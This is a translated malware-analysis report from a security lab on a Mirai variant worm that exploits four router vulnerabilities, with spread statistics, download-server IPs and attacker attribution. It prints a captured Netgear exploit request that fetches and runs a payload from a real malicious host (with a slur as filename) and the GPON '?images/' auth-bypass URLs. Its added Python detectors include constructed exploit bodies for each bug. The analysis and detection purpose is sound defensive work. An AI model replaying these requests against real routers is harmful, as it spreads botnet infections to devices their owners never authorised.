Author: murphyzhang, xmy, hjchjcjh
Preface:
Recently, the Listening to the Wind threat sensing platform of Tencent Security Yunding Lab detected a worm attacking routers. Analysis determined that it is a variant of Mirai. Unlike earlier Mirai, this worm spreads not only through the telnet brute-forcing used by the first generation of Mirai but also through router vulnerabilities. The sample captured this time can be traced back to a hacker known as Philly in Las Vegas, USA.
1. Payload and vulnerability analysis
Four payloads are involved in the propagation and attack phases of the sample, all of which target routers. Below we introduce the sample and analyze the relevant vulnerabilities.
Table: payload overview

| Attacked device | Device model | Vulnerability ID |
|---|---|---|
| Netgear router | DGN1000, DGN2000 | CNNVD-201306-024 |
| GPON fiber router | H640GR-02, H640GV-03, H640GW-02, H640RW-02, H645G | CVE-2018-10561/62 |
| Huawei HG532 series router | HG532 | CVE-2017-17215 |
| Linksys multiple routers | Cisco Linksys E4200, EA4500, EA3500, EA2700, E1000, E2100L | CNVD-2014-01260 |
Figure: distribution of affected devices
Data source: Tencent Security Yunding Lab
The figure above shows the countries affected by these router vulnerabilities. China, Russia, Japan and the United States suffer the most. This correlates with each country's level of development and internet penetration, and strongly with the sales regions of the routers listed above. Given the large installed base of domestic devices and their weak security, IoT security in China faces serious challenges in the years ahead.
We introduce the four vulnerabilities in turn:
01
Netgear router arbitrary command execution vulnerability
(CNNVD-201306-024)
1) Vulnerability analysis:
The PoC requests setup.cgi with the GET method, selects the syscmd handler through the todo parameter, and passes the command that downloads and runs the malware in the cmd parameter:
'GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear&curpath=/&currentsetting.htm=1 HTTP/1.1\r\n\r\n'
The code is as follows:
A. setup.cgi runs and then calls the setup main routine:
B. The PoC can be submitted with either GET or POST:
The value of the todo parameter is used directly to look up and call the corresponding handler, with no filtering at all. This is exactly the point the exploit abuses: todo=syscmd reaches the syscmd handler, which executes whatever is in cmd.
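As an added example (not code from the report), the following Python decodes the captured request above the way setup.cgi would: it undoes the + and %XX encoding and treats only & as a parameter separator, so the ; inside cmd survives into the shell command, where the shell then splits it into stages. It also pulls out the download URL and drop path as indicators. The function names are my own.

```python
# Added example: decode the captured Netgear setup.cgi request and recover
# the shell command and indicators. Not code from the original report.
import re
from urllib.parse import urlsplit, unquote_plus

# The request as captured by the honeypot (copied from the report above).
CAPTURED_REQUEST = (
    "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd"
    "&cmd=rm+-rf+/tmp/*;wget+http://46.17.47.82/gvv+-O+/tmp/nigger;sh+nigger+netgear"
    "&curpath=/&currentsetting.htm=1 HTTP/1.1\r\n\r\n"
)

def parse_query(query: str) -> dict:
    """Split a query string on '&' only and undo '+' / %XX encoding.

    ';' is deliberately not treated as a separator: the CGI keeps it inside
    the cmd value, and it is the shell that later splits the command on it.
    """
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def decode_netgear_syscmd(request: str) -> dict:
    """Return whether the request is the todo=syscmd exploit and, if so,
    the decoded command plus the URLs and drop paths found in it."""
    method, target, _version = request.strip().split(" ", 2)
    parts = urlsplit(target)
    params = parse_query(parts.query)
    todo = params.get("todo", [""])[0]
    if parts.path != "/setup.cgi" or todo != "syscmd":
        return {"exploit": False, "method": method, "todo": todo}
    cmd = params.get("cmd", [""])[0]
    return {
        "exploit": True,
        "method": method,
        "todo": todo,
        "command": cmd,
        # each ';'-separated piece is one stage: cleanup, download, execute
        "stages": [s.strip() for s in cmd.split(";") if s.strip()],
        "urls": re.findall(r"https?://[^\s'\"]+", cmd),
        # wget -O <path> is where the stager is written on the device
        "drop_paths": re.findall(r"-O\s+(\S+)", cmd),
    }

if __name__ == "__main__":
    for key, value in decode_netgear_syscmd(CAPTURED_REQUEST).items():
        print(f"{key}: {value}")
```

Running it prints the three stages (wipe /tmp, fetch the stager, run it with the argument netgear) and the download URL, which is the indicator worth blocking at the edge.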
2) Spread:
Figure: attack statistics for remote arbitrary command execution on Netgear DGN devices
Data source: Tencent Security Yunding Lab
The Netgear vulnerability is exploited most heavily in Russia, from which it can be inferred that Netgear devices have a large installed base there.
02
GPON fiber router command execution vulnerability
(CVE-2018-10561/62)
1) Vulnerability analysis:
The HTTP server on the device decides whether to require authentication by checking for a specific substring in the request path, which an attacker can use to bypass authentication on any endpoint.
Appending the string ?images/ to the URL is enough to gain access:
http://ip:port/menu.html?images/
http://ip:port/GponForm/diag_FORM?images/
Figure: GPON payload
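The authentication gate described above, modeled in Python as an added example (this is not the device's firmware code): the vulnerable gate matches the literal string images/ anywhere in the request target, so placing it in the query string unlocks any endpoint; the fixed gate decides on the decoded, normalised path only. PUBLIC_PREFIXES and SESSION_COOKIE are stand-ins of my own, and the session check is a placeholder.

```python
# Added example: model of the GPON HTTP server's authentication gate.
# Not the device's firmware code; names below are my own.
import posixpath
from urllib.parse import urlsplit, unquote

PUBLIC_PREFIXES = ("/images/",)      # static files served without login
SESSION_COOKIE = "valid-session"     # placeholder for a real session check

def vulnerable_gate(request_target: str, cookie: str = "") -> bool:
    """Allow the request through if it looks like a static image request.

    The test is a substring match on the whole request target, so
    '?images/' in the query string satisfies it for any endpoint.
    """
    if "images/" in request_target:
        return True
    return cookie == SESSION_COOKIE

def fixed_gate(request_target: str, cookie: str = "") -> bool:
    """Decide on the decoded, normalised path only; the query is ignored."""
    path = unquote(urlsplit(request_target).path)
    path = posixpath.normpath(path)          # collapses '..' and '//'
    if not path.startswith("/"):
        path = "/" + path
    is_public = any(path == p.rstrip("/") or path.startswith(p) for p in PUBLIC_PREFIXES)
    return is_public or cookie == SESSION_COOKIE

BYPASS_TARGETS = ["/menu.html?images/", "/GponForm/diag_FORM?images/"]

def compare_gates(targets=BYPASS_TARGETS) -> dict:
    """For each target, report (vulnerable verdict, fixed verdict) with no session."""
    return {t: (vulnerable_gate(t), fixed_gate(t)) for t in targets}

if __name__ == "__main__":
    for target, verdicts in compare_gates().items():
        print(f"{target}: vulnerable={verdicts[0]} fixed={verdicts[1]}")
```

The fixed gate decodes before normalising, so percent-encoded traversal (/images/%2e%2e/GponForm/diag_FORM) is collapsed to the real path before the public-prefix test runs; checking the prefix on the raw string would reopen the bypass.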
2) Spread:
Figure: attack statistics for the GPON device remote arbitrary command execution vulnerability
Data source: Tencent Security Yunding Lab
This vulnerability has a wide range of impact, including China, Georgia and Egypt. Fiber access is growing rapidly in China and the United States; Egypt and Georgia, whose markets are influenced by China, are also rolling out fiber quickly, which is one reason so many devices there are affected.
03
Huawei HG532 series router remote command execution vulnerability
(CVE-2017-17215)
1) Vulnerability analysis:
Figure: HG532 payload
The PoC first submits authentication information, then places the command to be executed inside the NewStatusURL tag of the UPnP Upgrade action. In the firmware's UPnP module we located the code that handles the NewStatusURL tag: it passes the value straight into system() through the format string upg -g -u %s -t 'Firmware Upgrade' ..., with no filtering at all.
2) Spread:
Figure: attack statistics for the Huawei HG532 remote command execution vulnerability
Data source: Tencent Security Yunding Lab
Figure: worldwide impact of CVE-2017-17215
Data source: Tencent Security Yunding Lab
The infection pattern of Huawei routers shows that the HG532 sells well in China, Russia, Japan and other countries, with Japan and Russia hit hardest. Made-in-China devices evidently have considerable reach in neighboring countries.
04
Linksys multiple routers tmUnblock.cgi ttcp_ip parameter remote command execution vulnerability
(CNVD-2014-01260)
1) Vulnerability analysis:
Multiple Linksys routers fail to properly sanitize the value of the ttcp_ip parameter handled by the tmUnblock.cgi script. A remote authenticated attacker can exploit this to execute arbitrary commands. Affected products include, but are not limited to:
E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900, E300, WAG320N, WAP300N, WAP610N, WES610N, WET610N, WRT610N, WRT600N, WRT400N, WRT320N, WRT160N, WRT150N
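All four payloads above are HTTP requests, so they can be tagged in honeypot or web-server logs with a handful of rules. The Python below is an added example, not part of the report or the lab's platform. The Netgear and GPON ?images/ patterns come straight from the requests shown on this page; the Huawei endpoint (/ctrlt/DeviceUpgrade_1), the GPON command-injection parameter (dest_host in diag_FORM), the Linksys body format and the UPnP port 37215 are taken from public write-ups of those vulnerabilities rather than from this page and are assumptions here. Every log line is constructed; only the Netgear request mirrors the one captured above.

```python
# Added example: tag honeypot HTTP requests that match the four router
# exploits discussed in this report. Not part of the report or the lab's
# platform. Request paths and parameters not shown on the page (the Huawei
# /ctrlt/DeviceUpgrade_1 endpoint, the GPON dest_host parameter, the UPnP
# port 37215) are taken from public write-ups of those CVEs and are
# assumptions here; every log line below is constructed.
import re
from urllib.parse import unquote_plus

# Shell metacharacters that turn a parameter value into a command.
INJECT = r"(?:%60|`|\$\(|;)"

RULES = [
    # (rule name, vulnerability id, method regex, target regex, body regex or None)
    ("netgear-setup.cgi-syscmd", "CNNVD-201306-024", r"GET|POST",
     r"^/setup\.cgi\?.*\btodo=syscmd\b.*\bcmd=", None),
    ("gpon-images-auth-bypass", "CVE-2018-10561", r"GET|POST",
     r"\?images/", None),
    ("gpon-diag_FORM-injection", "CVE-2018-10562", r"POST",
     r"^/GponForm/diag_FORM", r"dest_host=[^&]*" + INJECT),
    ("huawei-hg532-upnp-upgrade", "CVE-2017-17215", r"POST",
     r"^/ctrlt/DeviceUpgrade_1", r"<NewStatusURL>[^<]*" + INJECT),
    ("linksys-tmUnblock-ttcp_ip", "CNVD-2014-01260", r"POST",
     r"(?i)^/tmunblock\.cgi", r"ttcp_ip=[^&]*" + INJECT),
]

# Constructed log lines: timestamp|source|dest port|method|target|body
SAMPLE_LOG = [
    "2019-01-10T03:12:44Z|112.28.77.217|81|GET|/setup.cgi?next_file=netgear.cfg"
    "&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://203.0.113.5/gvv+-O+/tmp/n;sh+n+netgear"
    "&curpath=/&currentsetting.htm=1|",
    "2019-01-10T03:12:45Z|112.28.77.217|8080|POST|/GponForm/diag_FORM?images/|"
    "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget+http://203.0.113.5/g+-O+/tmp/g;sh+/tmp/g`&ipv=0",
    '2019-01-10T03:12:46Z|112.28.77.217|37215|POST|/ctrlt/DeviceUpgrade_1|'
    '<?xml version="1.0"?><s:Envelope><s:Body><u:Upgrade><NewStatusURL>'
    '$(wget http://203.0.113.5/h -O /tmp/h; sh /tmp/h)</NewStatusURL>'
    '<NewDownloadURL>HUAWEIUPNP</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>',
    "2019-01-10T03:12:47Z|112.28.77.217|8080|POST|/tmUnblock.cgi|"
    "ttcp_ip=-h+`cd+/tmp;wget+http://203.0.113.5/l;sh+l`&action=&ttcp_num=2&ttcp_size=2&StartEPI=1",
    "2019-01-10T03:13:01Z|198.51.100.7|80|GET|/images/logo.png|",
    "2019-01-10T03:13:02Z|198.51.100.7|80|POST|/setup.cgi?todo=save&cmd=|",
]

def classify(method: str, target: str, body: str = "") -> list:
    """Return [(rule name, vulnerability id)] for every rule the request matches."""
    hits = []
    decoded_body = unquote_plus(body)   # catch %60 / + encoded payloads too
    for name, vuln_id, m_re, t_re, b_re in RULES:
        if not re.fullmatch(m_re, method) or not re.search(t_re, target):
            continue
        if b_re and not (re.search(b_re, body) or re.search(b_re, decoded_body)):
            continue
        hits.append((name, vuln_id))
    return hits

def scan_log(lines) -> list:
    """Return (source, dest port, rule name, vulnerability id) per match."""
    findings = []
    for line in lines:
        _ts, src, dport, method, target, body = line.split("|", 5)
        for name, vuln_id in classify(method, target, body):
            findings.append((src, int(dport), name, vuln_id))
    return findings

def multi_exploit_sources(findings, threshold: int = 2) -> dict:
    """Sources hitting several distinct vulnerabilities: worm-like behaviour."""
    per_src = {}
    for src, _port, _name, vuln_id in findings:
        per_src.setdefault(src, set()).add(vuln_id)
    return {s: sorted(v) for s, v in per_src.items() if len(v) >= threshold}

if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(multi_exploit_sources(hits))
```

The body rules require a shell metacharacter in the injected parameter rather than matching the endpoint alone, so legitimate ping diagnostics or firmware-upgrade requests do not fire; the multi_exploit_sources summary is the signal that separates a worm sweeping every exploit it carries from a one-off scanner.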
2) Spread:
Figure: statistics for the Linksys multiple-router remote command execution vulnerability
Data source: Tencent Security Yunding Lab
The download addresses of the related samples are quite fixed, located almost entirely in Las Vegas, Singapore, Moscow and Amsterdam; the router-botnet underground is essentially active in these places.
Figure: malware server distribution
Data source: Tencent Security Yunding Lab
Detailed server distribution is shown in the table below:
Table: download IP addresses of captured samples
| Vulnerability | IP address | Geographic location |
|---|---|---|
| GPON fiber router command execution vulnerability (CVE-2018-10561/62) | 205.185.122.121 (l.ocalhost.host) | Las Vegas, Nevada, USA |
| | 46.29.163.28 (cnc.methaddict.xyz) | Moscow, Russia |
| | 46.17.47.82 | Moscow, Russia |
| | 46.29.166.125 | Moscow, Russia |
| | 194.182.65.56 | Czech Republic |
| | 128.199.137.201 | Singapore |
| | 185.244.25.176 | Amsterdam, Netherlands |
| | 159.89.204.166 | Singapore |
| | 206.189.12.31 | Amsterdam, Netherlands |
| | 128.199.222.37 | Singapore |
| | 185.244.25.188 | Amsterdam, Netherlands |
| | 185.223.163.17 | Estonia |
| | 142.93.175.10 | Frankfurt, Hesse, Germany |
| | 46.183.218.247 | Latvia |
| | 185.244.25.194 | Amsterdam, Netherlands |
| | 176.32.33.123 | Moscow, Russia |
| Huawei HG532 series router remote command execution vulnerability (CVE-2017-17215) | 209.141.33.86 | Las Vegas, Nevada, USA |
| | 167.88.161.40 | Las Vegas, Nevada, USA |
| | 213.183.63.181 | Sofia, Bulgaria |
| | 195.62.53.38 | Moscow, Russia |
| Linksys multiple routers tmUnblock.cgi ttcp_ip parameter remote command execution vulnerability (CNVD-2014-01260) | 209.141.33.119 | Las Vegas, Nevada, USA |
| | 209.141.50.26 | Las Vegas, Nevada, USA |
| | 185.244.25.222 | Amsterdam, Netherlands |
2. Sample analysis
Sample MD5:
099b88bb74e9751abb4091ac4f1d690d
Source address statistics (112.28.77.217): 13 hits, mainly against ports 81 and 8080
Download IP: 46.17.47.82
The sample belongs to the same family as Mirai and is a Mirai variant: the code structure and the decrypted strings are very similar, but this variant uses three router vulnerabilities to spread.
The structure of the Mirai bot code is as follows:
It consists of three modules: the attack module, the scanner module and the killer (process-termination) module. The sample has the same code structure as Mirai, with three router-exploit scanning modules added.
Unlike earlier Mirai, it checks /dev/watchdog, /dev/misc/watchdog, /dev/ftwdt101_watchdog, /dev/ftwdt101\ watchdog, /dev/ftwdt101/watchdog, /sbin/watchdog, /bin/watchdog, /etc/default/watchdog, /etc/watchdog and others in order to keep the device from rebooting.
Compared with classic Mirai, which only handles /dev/watchdog and /dev/misc/watchdog, many new watchdog paths are checked.
The list also includes the paths checked by Linux.Okiru (/dev/ftwdt101_watchdog, /dev/ftwdt101\ watchdog).
The attack server hosts many related files: builds of the bot for various operating-system platforms.
Sample traceability:
The following PoC contains the download address:
Visiting 46.17.47.82/cutie, we found that it contains the real download links.
The files are saved to:
/tmp/gdf, /tmp/gxy, /tmp/dhf, /tmp/ttb
Accessing the server's root directory directly reveals a Twitter address:
The Twitter account belongs to Philly, an American. The malware is stored under the path nigr, a name Philly uses for himself. No tweets directly related to the worm were found on the account.
Figure: related Twitter screenshot
About sample capture:
The samples were captured by the Listening to the Wind threat sensing platform of Tencent Security Yunding Lab, a honeypot network cluster deployed at multiple nodes around the world to capture real malicious traffic; it records hundreds of millions of attacks every day.
The capture interface is shown below:
References:
https://www.freebuf.com/vuls/171457.html
https://www.linuxidc.com/Linux/2014-02/97171.htm
https://xlab.tencent.com/cn/2018/01/05/a-new-way-to-exploit-cve-2017-17215/
Tencent Security Yunding Lab focuses on security research and security operations for virtual machines and cloud traffic. It uses machine learning and big-data technology to monitor and analyze all kinds of risk information in real time, helping customers withstand advanced persistent threats, and works with all of Tencent's security labs on vulnerability research to secure the cloud computing platform as a whole. These capabilities are offered through Tencent Cloud as services such as intrusion detection and vulnerability risk early warning, helping enterprises solve server security problems.